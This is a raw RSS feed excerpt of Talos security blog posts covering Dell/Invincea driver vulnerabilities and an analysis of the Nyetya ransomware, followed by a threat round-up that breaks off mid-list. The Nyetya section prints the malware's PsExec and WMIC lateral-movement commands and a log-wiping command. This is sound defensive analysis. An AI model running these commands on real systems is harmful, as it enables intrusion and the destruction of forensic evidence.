&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/xX_tCOnymFk" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T09:55:00.357-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-WPWy4CVApVw/WV0Vn3dqn9I/AAAAAAAABQU/VMA6gRfjBdQwuy9i3YMEawNZYaffZuuhACK4BGAYYCw/s72-c/Screenshot%2B2017-07-04%2B11.03.09.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/the-medoc-connection.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Dell Precision Optimizer and Invincea Vulnerabilities</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/GK1_4XepLy0/vulnerability-spotlight-dell-precision.html</link><category>CVE-2016-8732</category><category>CVE-2016-9038</category><category>CVE-2017-2802</category><category>dell</category><category>invincea</category><category>Vulnerability</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Martin Lee)</author><pubDate>Fri, 30 Jun 2017 11:05:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-9119534736444221448</guid><description>Vulnerabilities discovered by Marcin ‘Icewall’ Noga of Cisco Talos.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Overview&lt;/h2&gt;&lt;br /&gt;Talos are releasing advisories for vulnerabilities in the Dell Precision Optimizer application  service software, Invincea-X and Invincea Dell Protected Workspace. These packages are pre-installed on certain Dell systems. Vulnerabilities present in these applications could allow attackers to disable security mechanisms, escalate privileges and execute arbitrary code within the context of the application user.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Vulnerability Details&lt;/h2&gt;&lt;h3&gt;Privilege Escalation Vulnerability TALOS-2016-0256 (CVE-2016-9038)&lt;/h3&gt;&lt;br /&gt;This vulnerability is a double fetch in the SboxDrv.sys driver. The vulnerability is triggered by sending crafted data to the \Device\SandboxDriverApi device driver which is read/write accessible to everyone. A successful exploitation results in an arbitrary value written to kernel memory space, which can lead to local privilege escalation.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Invincea-X, Dell Protected Workspace 6.1.3-24058&lt;br /&gt;&lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0256"&gt;TALOS-2016-0256&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Protection Bypass Vulnerability TALOS-2016-0246 (CVE-2016-8732)&lt;/h3&gt;&lt;br /&gt;Invincea Dell Protected Workspace is a security solution offered by Dell that seeks to provide enhanced protection for endpoints. Multiple security flaws exist within one of the driver components, ‘InvProtectDrv.sys’ that is included in version 5.1.1-22303 of this software. Due to weak restrictions on the driver communications channel, as well as insufficient validation, an attacker controlled application that is executed on an affected system could leverage this driver to effectively disable some of the protection mechanisms provided by the software.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Invincea, Dell Protected Workspace 5.1.1-22303&lt;br /&gt;This vulnerability is fixed in the 6.3.0 release of the software. &lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0246"&gt;TALOS-2016-2046&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Protection Bypass Vulnerability TALOS-2016-0247 (CVE-2017-2802)&lt;/h3&gt;&lt;br /&gt;During the start of ‘Dell PPO Service’, supplied by Dell Precision Optimizer application, the program “c:\Program Files\Dell\PPO\poaService.exe” loads the dll, “c:\Program Files\Dell\PPO\ati.dll”. This in turn attempts to load “atiadlxx.dll”, which is not present by default in the application directory. The program searches for an appropriately named dll in the directories specified by the PATH environment variable. If it finds a dll with the same name, it will load the dll into poaService.exe without checking the signature of the dll. This can lead to execution of arbitrary code if an attacker supplies a malicious dll of the correct name. &lt;br /&gt;&lt;br /&gt;Dell has released an update to resolve this issue. All versions from v4.0 onwards are not vulnerable, for more information see: &lt;a href="https://www.dell.com/optimizer"&gt;www.dell.com/optimizer&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Known vulnerable: Dell Precision Tower 5810 with nvidia graphic cards, PPO Policy Processing Engine (3.5.5.0), ati.dll (PPR Monitoring Plugin) (3.5.5.0).&lt;br /&gt;&lt;br /&gt;More details can be found in the vulnerability report: &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0247"&gt;TALOS-2016-2047&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Security Implications&lt;/h2&gt;&lt;br /&gt;Given that the Invincea Dell Protected Workspace is an application that is commonly deployed to secure workstations within high security environments, it is recommended that organizations using affected versions of this solution update to the latest version as quickly as possible to ensure that the protections provided by this software cannot be bypassed by an attacker. Dell Protected Workspace is based on Invincea's software. Dell is currently working on providing an update to incorporate Invincea's fix. Organisations need to carefully consider the risks and benefits of software bundled with devices. Potentially, any software may contain exploitable vulnerabilities. Bundled software can provide usefully functionality, but if it is unused, allowing it to persist on devices exposes organisations to vulnerabilities without providing any benefits in return. As with any unused software, removing the software removes associated vulnerabilities and removes an additional package from patching schedules.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;br /&gt;The following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules: 41306 - 41309, 41312 - 41313&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=GK1_4XepLy0:wsRIGt68t8U:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/GK1_4XepLy0" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T14:00:10.594-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/vulnerability-spotlight-dell-precision.html</feedburner:origLink></item><item><title>New Ransomware Variant "Nyetya" Compromises Systems Worldwide</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/308HM9R-tjw/worldwide-ransomware-variant.html</link><category>AMP</category><category>Coverage</category><category>Nyetya</category><category>ransomware</category><category>SMBv1</category><category>Snort</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Tue, 27 Jun 2017 11:02:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-3791719894738262452</guid><description>&lt;i&gt;&lt;b&gt;Note: &lt;/b&gt;This blog post discusses active research by Talos into a new threat. This information should be considered preliminary and will be updated as research continues.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Update 2017-07-06 12:30 EDT: Updated to explain the modified DoublePulsar backdoor&lt;/i&gt;.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s1600/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="432" data-original-width="768" height="360" src="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s640/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Since the SamSam attacks that targeted US healthcare entities in March 2016, Talos has been concerned about the proliferation of malware via unpatched network vulnerabilities. In May 2017, WannaCry ransomware took advantage of a vulnerability in SMBv1 and spread like wildfire across the Internet.&lt;br /&gt;&lt;br /&gt;Today a new malware variant has surfaced that is distinct enough from Petya that people have referred to it by various names such as Petrwrap and GoldenEye. Talos is identifying this new malware variant as Nyetya. The sample leverages EternalBlue, EternalRomance, WMI, and PsExec for lateral movement inside an affected network. This behavior is detailed later in the blog under "Malware Functionality".  Unlike WannaCry, Nyetya does not appear to contain an external scanning component.  &lt;br /&gt;&lt;br /&gt;The identification of the initial vector is still under investigation. We have observed &lt;b&gt;no use&lt;/b&gt; of email or Office documents as a delivery mechanism for this malware. We believe that infections are associated with software update systems for a Ukrainian tax accounting package called MeDoc. Talos is investigating this currently.&lt;br /&gt;&lt;br /&gt;Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated. Talos strongly recommends users and organizations decline to pay the ransom. Any attempts to obtain a decryption key will be fruitless as the associated mailbox used for payment verification and decryption key sharing has been shut down by the posteo.de. This renders any successful payment as useless as there is no method of communication available for this actor to use to verify payments from victims or distribute decryption keys once ransom payments have been received. There is also no method used by the malware to directly connect to command and control for remote unlocking.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2 id="h.hk5xzbqepboi"&gt;Recovery of User Credentials&lt;/h2&gt;Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the "Malware Functionality" section). Talos has identified three ways Nyetya can obtain these credentials.&lt;br /&gt;&lt;br /&gt;First, credentials can be manually passed in via a command line argument. Here is the syntax:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;rundll32.exe C:\Windows\perfc.dat,#1 60 "username:password"&lt;/pre&gt;&lt;br /&gt;A second method consists to use the CredEnumerateW Windows API.&lt;br /&gt;&lt;br /&gt;Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. The executables related to credential recovery are dropped as a temporary files in the user’s %TEMP% folder and run with a named pipe parameter (containing a GUID). The main executable communicates with the dropped executable using this named pipe.&amp;nbsp; For example:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;C:\WINDOWS\TEMP\561D.tmp, \\.\pipe\{C1F0BF2D-8C17-4550-AF5A-65A22C61739C}&lt;/pre&gt;&lt;br /&gt;The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques.&lt;i&gt;&lt;b&gt; However, Talos has confirmed that the executable is not specifically the Mimikatz tool.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. This is detailed below.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.a8qzukac72jg"&gt;Malware Functionality &lt;/h2&gt;Perfc.dat contains the functionality needed to further compromise the system and contains a single unnamed export function referred to as #1. As part of the propagation process, the malware enumerates all visible machines on the network via the NetServerEnum API call and then scans for an open TCP 139 port. This is done to compile a list of devices that expose this port and may possibly be susceptible to compromise.&lt;br /&gt;&lt;br /&gt;Nyetya has several mechanisms that are used to propagate once a device is infected:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;EternalBlue - the same exploit used by WannaCry.&lt;/li&gt;&lt;li&gt;EternalRomance - an SMBv1 exploit leaked by "ShadowBrokers"&lt;/li&gt;&lt;li&gt;PsExec - a legitimate Windows administration tool.&lt;/li&gt;&lt;li&gt;WMI - Windows Management Instrumentation, a legitimate Windows component.&lt;/li&gt;&lt;/ol&gt;These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally.&lt;br /&gt;&lt;br /&gt;For systems that have not had &lt;a href="https://technet.microsoft.com/en-us/library/security/ms17-010.aspx"&gt;MS17-010&lt;/a&gt; applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;EternalBlue&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Windows Server 2008 R2&lt;/li&gt;&lt;li&gt;Windows Server 2008&lt;/li&gt;&lt;li&gt;Windows 7&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;EternalRomance&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Windows XP&lt;/li&gt;&lt;li&gt;Windows Server 2003&lt;/li&gt;&lt;li&gt;Windows Vista &lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;The attacker modified the command codes:&lt;/li&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Original Command Code&lt;/td&gt;&lt;td&gt;Nyetya Command Code&lt;/td&gt;&lt;td&gt;Purpose&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x23&lt;/td&gt;&lt;td&gt;0xF0&lt;/td&gt;&lt;td&gt;PING&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x77&lt;/td&gt;&lt;td&gt;0xF1&lt;/td&gt;&lt;td&gt;KILL&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0xC8&lt;/td&gt;&lt;td&gt;0xF2&lt;/td&gt;&lt;td&gt;EXEC&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;li&gt;The attacker modified the response codes:&lt;/li&gt;&lt;br /&gt;&lt;table border="1"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Original Response Code&lt;/td&gt;&lt;td&gt;Nyetya Response Code&lt;/td&gt;&lt;td&gt;Purpose&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x10&lt;/td&gt;&lt;td&gt;0x11&lt;/td&gt;&lt;td&gt;OK&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x20&lt;/td&gt;&lt;td&gt;0x21&lt;/td&gt;&lt;td&gt;CMD_INVALID&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;0x30&lt;/td&gt;&lt;td&gt;0x31&lt;/td&gt;&lt;td&gt;ALLOCATION_FAILURE&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;li&gt;The attacker modified where the response code is stored in the SMB response packet. In the original version of DouplePulsar, the code was stored in the MultiplexID field (offset 0x1E). In the Nyetya version, the response code is stored in a reserved field (offset 0x16) which is normally set to 0x0000&lt;/li&gt;&lt;/ul&gt;We implemented a specific NGIPS / Snort rule to detect this DoublePulsar variant: 43459. &lt;br /&gt;&lt;br /&gt;PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the "Recovery of User Credentials" section above) to install the malware on the networked device. &lt;br /&gt;&lt;br /&gt;&lt;pre&gt;C:\WINDOWS\dllhost.dat \\w.x.y.z -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60&lt;/pre&gt;&lt;br /&gt;WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the "Recovery of User Credentials" section above. &lt;br /&gt;&lt;br /&gt;&lt;pre&gt;Wbem\wmic.exe /node:"w.x.y.z" /user:"username" /password:"password" "process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"&lt;/pre&gt;&lt;br /&gt;Once a system is successfully compromised, the malware encrypts files on the host using 2048-bit RSA encryption. Additionally, the malware cleans event logs on the compromised device using the following command:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;wevtutil cl Setup &amp;amp; wevtutil cl System &amp;amp; wevtutil cl Security &amp;amp; wevtutil cl Application &amp;amp; fsutil usn deletejournal /D %c:&lt;/pre&gt;&lt;br /&gt;Nytetya attempts to obtain administrative privileges (SeShutdowPrivilege and SeDebugPrivilege) for the current user through the Windows API AdjustTokenPrivileges. If successful, Nyetya overwrites the boot sector on PhysicalDrive0 without first saving a copy. If overwriting the boot sector fails, Nyetya instead wipes the first ten sectors of the disk drive. Additionally, if Nyetya finds a process file name hash of 2E214B44 on the system, it will also wipe the first ten sectors of the disk drive. Talos has identified that this hash is referring to avp.exe, which corresponds to Kaspersky Anti-virus. Systems that have the boot sector overwritten will see this message when restarting their systems.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-gY_ZCZZeYSk/WVLtS0FVbEI/AAAAAAAABJU/AOl5CIIpaSUWmKGhEBnJclwpnK-a0NM0gCLcBGAs/s1600/Nyetya-ransom-screen.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1440" height="353" src="https://4.bp.blogspot.com/-gY_ZCZZeYSk/WVLtS0FVbEI/AAAAAAAABJU/AOl5CIIpaSUWmKGhEBnJclwpnK-a0NM0gCLcBGAs/s640/Nyetya-ransom-screen.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Screenshot of a system compromised by Nyetya.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection.&lt;br /&gt;&lt;br /&gt;Without analyzing the key generation or key storage components, Talos believes that the actors behind Nyetya did not intended for the boot sector or the ten sectors that are wiped to be restorable. Thus, Nyetya is intended to be destructive rather than as a tool for financial gain.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.dhwqfl8vf3y7"&gt;Mitigation and Prevention&lt;/h2&gt;There are several ways customers can mitigate and prevent Nyetya from impacting your environment. &lt;br /&gt;&lt;ul&gt;&lt;li&gt;First and foremost, we strongly recommend that customers who have NOT yet already applied MS17-010 to go do so immediately. Given the severity of the vulnerability and the widely available tools that exploit it, leaving this vulnerability unpatched is unwise.&lt;/li&gt;&lt;li&gt;Ensure you have anti-malware software deployed on your systems that can detect and block the execution of known malicious executables.&lt;/li&gt;&lt;li&gt;Implement a disaster recovery plan that includes backing up and restoring data from backup devices that are kept offline. Adversaries frequently target backup mechanisms to limit the possibilities a user may be able to restore their files without paying the ransom.&lt;/li&gt;&lt;li&gt;Disable SMBv1, if possible, on networks and move to a more updated version of SMB. (SMBv2 was introduced with Microsoft Vista)&lt;/li&gt;&lt;li&gt;Organizing your networks in a number of well-defined logical segments, and allowing access to network assets only to those users and systems within a segment may help with containing outbreaks of self-spreading worms such as Nyetya.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;As Nyetya attempts to overwrite the boot sector on an infected machine, Talos tested using &lt;a href="https://www.talosintelligence.com/mbrfilter"&gt;MBRFilter&lt;/a&gt; to prevent any changes being allowed to the system boot sector. This test proved successful and the machine boot sector remained intact in a good state.&amp;nbsp; For users or enterprises that can do so, we recommend using MBRFilter.&amp;nbsp; Note that MBRFilter is an open source project from Talos and no warranties or guarantees are provided.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.6kl8n16ffhdt"&gt;Coverage&lt;/h2&gt;&lt;div id="h.sl1h3yby30q8"&gt;Cisco customers are protected from Nyetya via the following products and services.&lt;/div&gt;&lt;div id="h.sl1h3yby30q8"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-arfMQxDGClk/WVLuhtJ--4I/AAAAAAAABJc/5X2wZDQ7fe4VW8sOKXiS5UEvrlYI2rbiACLcBGAs/s1600/amp-netsec-tg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1342" data-original-width="1600" height="335" src="https://3.bp.blogspot.com/-arfMQxDGClk/WVLuhtJ--4I/AAAAAAAABJc/5X2wZDQ7fe4VW8sOKXiS5UEvrlYI2rbiACLcBGAs/s400/amp-netsec-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div id="h.sl1h3yby30q8"&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; can detect malicious activity associated with this threat.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;Email and web have not been identified as attack vectors at this time. Additionally, there are no known C2 elements related to this malware at this time.  The malware, if transferred across these systems on your networks, will be blocked.&lt;br /&gt;&lt;br /&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on &lt;a href="https://www.snort.org/products"&gt;Snort.org&lt;/a&gt;.&lt;/div&gt;&lt;h3 id="h.2mb1e0vweyf9"&gt;NGIPS / Snort Rules&lt;/h3&gt;The following NGIPS / Snort rules detect this threat:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;42944 - OS-WINDOWS Microsoft Windows SMB remote code execution attempt&lt;/li&gt;&lt;li&gt;42340 - OS-WINDOWS Microsoft Windows SMB anonymous session IPC share access attempt&lt;/li&gt;&lt;li&gt;41984 - OS-WINDOWS Microsoft Windows SMBv1 identical MID and FID type confusion attempt&lt;/li&gt;&lt;li&gt;43459 - MALWARE-CNC Win.Trojan.Doublepulsar variant successful ping response&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;The following NGIPS / Snort rules are also indicators of infection traffic:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;5718 - OS-WINDOWS Microsoft Windows SMB-DS Trans unicode Max Param/Count OS-WINDOWS attempt&lt;/li&gt;&lt;li&gt;1917 - INDICATOR-SCAN UPnP service discover attempt&lt;/li&gt;&lt;li&gt;5730 - OS-WINDOWS Microsoft Windows SMB-DS Trans Max Param OS-WINDOWS attempt&lt;/li&gt;&lt;li&gt;26385 - FILE-EXECUTABLE Microsoft Windows executable file save onto SMB share attempt&lt;/li&gt;&lt;li&gt;43370 - NETBIOS DCERPC possible wmi remote process launch&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h3 id="h.7vb8fcv8lfs1"&gt;Threat Grid&lt;/h3&gt;Threat Grid is capable of detecting malware samples related to Nyetya as malicious.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-zcF5-O83Wlw/WVLwsJHiVbI/AAAAAAAABJo/ZNvZIC31vmMGmDfObcoWPhPJ9shh3qJ3QCLcBGAs/s1600/Screen%2BShot%2B2017-06-27%2Bat%2B6.13.52%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="629" data-original-width="1600" height="249" src="https://2.bp.blogspot.com/-zcF5-O83Wlw/WVLwsJHiVbI/AAAAAAAABJo/ZNvZIC31vmMGmDfObcoWPhPJ9shh3qJ3QCLcBGAs/s640/Screen%2BShot%2B2017-06-27%2Bat%2B6.13.52%2BPM.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.ppbli1igosey"&gt;Indicators of Compromise (IOCs)&lt;/h2&gt;&lt;h3 id="h.kgemys46433z"&gt;AMP Coverage&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;W32.Ransomware.Nyetya.Talos&lt;/li&gt;&lt;/ul&gt;&lt;h3 id="h.74psw8p2s4b5"&gt;SHA256&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998 (password stealer)&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=308HM9R-tjw:yPbtD0pbOmI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/308HM9R-tjw" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T12:32:52.465-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-93obnOaP-xA/WVQ-U9V1uMI/AAAAAAAABJ4/yTs9T88dAXsWtd-AA5uxk8eZGYLClJ8ZQCLcBGAs/s72-c/295C30B1-A6BA-4FA7-9384-223EFA1B3075.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">21</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html</feedburner:origLink></item><item><title>Threat Round-up for June 16 - June 23</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/LGYCPT-CKkM/threat-roundup-0616-0623.html</link><category>ClamAV</category><category>Coverage</category><category>Malware</category><category>Snort</category><category>Umbrella</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Fri, 23 Jun 2017 12:55:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-1841553473017849420</guid><description>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 16 and June 23. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.&lt;br /&gt;&lt;br /&gt;As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;This week's most prevalent threats are:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Doc.Macro.StrObfuscation-6329879-0&lt;/b&gt;&lt;br /&gt;VB Macro&lt;br /&gt;Microsoft Office macros can be obfuscated in various ways. A recent resurgence of malicious Word documents include the use of a string obfuscation to mask the intended functionality&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Dropper.skypee-6329923-0&lt;/b&gt;&lt;br /&gt;Dropper&lt;br /&gt;This malware is a trojan dropper that is used to steal banking information and user credentials. It leverages Visual Basic code to install itself and establish persistence. Characteristics this malware exhibits include connecting to different domains to POST data using URI patterns like /http/image.php or /admin/image.php. &lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Worm.Untukmu-5949608-0&lt;/b&gt;&lt;br /&gt;Worm&lt;br /&gt;Untukmu, also known as Brontok, is a worm spread through email or infected USB drives. It stores several copies of itself on different places on the hard disk, including system directories. It gains persistence by modifying registry keys and creating an entry in the Startup directory. IT also modifies several system configuration parameters to disable the registry editor and the shell, as well as modify the safeboot shell to prevent the user from cleaning the machine.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Shifu-6330434-1&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;This well-known malware family contains counter measures to protect itself from analysis. It gathers details about its victims by stealing user's login credentials for online banking business.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Trojan.Blackshades-6327385-1&lt;/b&gt;&lt;br /&gt;Trojan&lt;br /&gt;Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Win.Ransomware.BTCWare-6329927-0&lt;/b&gt;&lt;br /&gt;Ransomware&lt;br /&gt;BTCWare is active Windows ransomware that was first discovered a few months ago. Since then, it has undergone various changes, including changes to the encrypted file extension &amp;amp; the cipher used to encrypt such files. Earlier variants relied on weaker cryptography options that included RC4, allowing brute force recovery of the private key in some cases. There was also a noted variant that had its private RSA key leaked online. This recent variant relies on AES-256 with improvements to the handling of the private key generation.&lt;br /&gt;&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Doc.Dropper.Agent-6330744-0&lt;/b&gt;&lt;br /&gt;Office Macro Downloader&lt;br /&gt;This is an obfuscated Office Macro downloader that leverages Powershell to download a malicious payload executable. The host that these samples attempt to download the next stage from currently does not resolve.&lt;br 